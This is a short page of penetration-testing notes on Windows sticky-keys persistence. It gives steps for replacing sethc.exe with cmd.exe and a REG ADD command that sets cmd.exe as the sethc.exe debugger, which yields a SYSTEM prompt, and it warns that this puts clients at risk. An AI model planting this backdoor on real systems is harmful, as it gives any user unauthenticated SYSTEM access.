02-Persistence, 02-Kiosk Break Out

Copying sethc.exe

Once you already have administrative access you can easily install sticky keys based persistence by performing the following:

  • Make a copy of sethc.exe
  • Copy cmd.exe to C:\Windows\System32\sethc.exe
  • Reboot and hit shift 5 times!

Registry Key

Another method is by leveraging registry keys running the following command:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
  • If you use sticky keys for persistence any user can hit shift five times and get command prompt running as SYSTEM. BE CAREFUL!!! You shouldn’t introduce risks to your clients

Resources:

TitleURL
placeholder

Also Check Out:

  • PLACEHOLDER